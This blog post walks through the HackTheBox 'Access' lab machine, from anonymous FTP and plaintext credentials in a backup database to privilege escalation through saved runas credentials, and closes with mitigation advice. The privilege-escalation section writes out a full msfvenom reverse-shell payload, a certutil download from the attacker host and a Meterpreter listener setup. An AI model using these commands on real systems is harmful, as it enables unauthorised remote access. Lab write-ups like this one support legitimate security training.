HackTheBox - Access Walkthrough

# Mar 2, 2019

Access

1. Recon and Information gathering

Nmap

╭─root@warmachine ~/hackthebox/access
╰─# cat base_tcp.nmap
# Nmap 7.70 scan initiated Sun Feb 24 22:40:43 2019 as: nmap -sV -sC -oN base_tcp.nmap 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.037s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SERVICES

IIS/HTTP

Running gobuster here while poking around the other services gets me only aspnet_client/system_web which is pretty much useless for me. On to the interesting stuff…

Telnet

Connecting to telnet (port 23/tcp) leads me to a login prompt for Welcome to Microsoft Telnet Service. Sadly, trying couple of common passwords doesn’t result in successful login.

FTP

Okay, so I have a ftp server with anonymous login. The error regarding directory listing is caused my the PASSV mode - disabling it allows me to list the directories and see there are two of them:

lftp 10.10.10.98:~> set ftp:passive-mode off
lftp 10.10.10.98:~> ls
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer

And inside I can see Access Control.zip and backup.mdb. The first is a password protected archive and the second - MS Access db.

backup.mdb

I used mdb-tools (as most would do after googling how to open mdb in Kali :D) and after playing a bit with the different commands I found the table I needed:

╭─root@warmachine ~/hackthebox/access  
╰─# mdb-export backup.mdb auth_user                                                                                                                                                                            1 ↵
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Cha-ching - I have password - checking it agains the archive yields success:

╭─root@warmachine ~/hackthebox/access
╰─# 7z e 'Access Control.zip'

and use access4u@security as password

╭─root@warmachine ~/hackthebox/access  
╰─# readpst Access\ Control.pst

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Now I have another user and password: security/4Cc3ssC0ntr0ller. Having seen the login prompt on the telnet service (and the lack of interesting stuff on the http end) I decided to try the credentials there. Well it worked and I got user access :)

2. Gaining foothold/low priv user

╭─root@warmachine ~/hackthebox/access
╰─# telnet 10.10.10.98 23                                                                           1 ↵
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security> type C:\Users\security\Desktop\user.txt
<...>

C:\>systeminfo                            
                                          
Host Name:                 ACCESS         
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600

3. Enumerating the system

Before starting the enumeration I tried creating and executing a rev shell (made with metasploit), but failed - guess I have to escalate before getting rid of the telnet :(

After some time poking here and there (the usual stuff - http://www.fuzzysecurity.com/tutorials/16.html etc.) and failing to find useful stuff I found an interesting shortcut for ZKAccess3.5 Security System in the Public user’s Desktop and after inspecting it it looks like someone decided it’s a good idea to use runas (with saved credentials(!)) for giving access to unprivileged user (without providing authentication)… wut?! Doing additional checks confirms it:

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator Type: Domain Password
User: ACCESS\Administrator

/savecred: Saves the password so it has to be entered only the first time the RunAs command is used.

The /savecred parameter is an extremely bad idea, as it creates a gaping security hole. In short, once you’ve used /savecred, any user at the computer can use the RunAs command to run any program with administrator privileges.

So let’s try and run the shell we coudn’t before:

4. Escalating privileges

Create the shell (exe) on my Kali VM:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.22 LPORT=4747 -f exe > shell.exe

Download it on Access via certutil (have to be in a directory you can write to ;)):

certutil.exe -urlcache -split -f "http://10.10.14.22:8000/shell.exe" shell.exe

Setup msfconsole on my Kali VM so there is something to listen for the reverse shell:

msf5 > use exploit/multi/handler                                                                                                                                   
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp                                                                          
payload => windows/meterpreter/reverse_tcp                                                                                                           
msf5 exploit(multi/handler) > set lhost 10.10.14.22                                                                                       
lhost => 10.10.14.22                                                                                                                                 
msf5 exploit(multi/handler) > set lport 4747                                                                                                       
lport => 4747                                                                                                                                                              
msf5 exploit(multi/handler) > set ExitOnSession false                                                                                      
ExitOnSession => false                                                                                                                           
msf5 exploit(multi/handler) > exploit -j                                                                                                                            
[*] Exploit running as background job 0.                                                                                                                         
[*] Exploit completed, but no session was created.                                                                                                                            
[*] Started reverse TCP handler on 10.10.14.22:4747

Execute shell.exe as Administrator via runas:

C:\Users\security>runas /savecred /user:ACCESS\Administrator shell.exe

Check your metasploit sessions and check your access:

msf5 exploit(multi/handler) > [*] Sending stage (179779 bytes) to 10.10.10.98                                                                           
[*] Meterpreter session 1 opened (10.10.14.22:4747 -> 10.10.10.98:49159) at 2019-02-25 21:11:56 +0200

msf5 exploit(multi/handler) > sessions                                                                                       
Active sessions                                 
===============                                                                                                    
  Id  Name  Type                     Information                    Connection                                     
  --  ----  ----                     -----------                    ----------                                     
  1         meterpreter x86/windows  ACCESS\Administrator @ ACCESS  10.10.14.22:4747 -> 10.10.10.98:49159 (10.10.10.98)                                               
msf5 exploit(multi/handler) > sessions -i 1                        
[*] Starting interaction with 1...      

meterpreter > sysinfo
Computer        : ACCESS
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : en_US
Domain          : HTB
Logged On Users : 4
Meterpreter     : x86/windows

Profit :)

meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2018-08-21 23:43:14 +0300  desktop.ini
100666/rw-rw-rw-  32    fil   2018-08-22 01:07:24 +0300  root.txt

meterpreter > cat root.txt
<...>

5. Mitigations

User

Well this should be no brainer: under no circumstances save credentials on public share :) Don’t do this with backups either :D As we are at it - don’t store user passwords in plaintext, aaand.. don’t send sensitive data in plaintext mails ;)

Use save communication channels for sending sensitive data (the mail was in clear text, it’s archive was password protected)

Don’t store passwords in plaintext in databases

Don’t store backups on public shares

Root

On RunAs - it’s a useful tool, but the /savecred option makes it a serious security hole. This gives every user on the machine a way to run everything he wants to as Administrator

Don’t user the /savecred option on RunAs

Kiril's Security Blog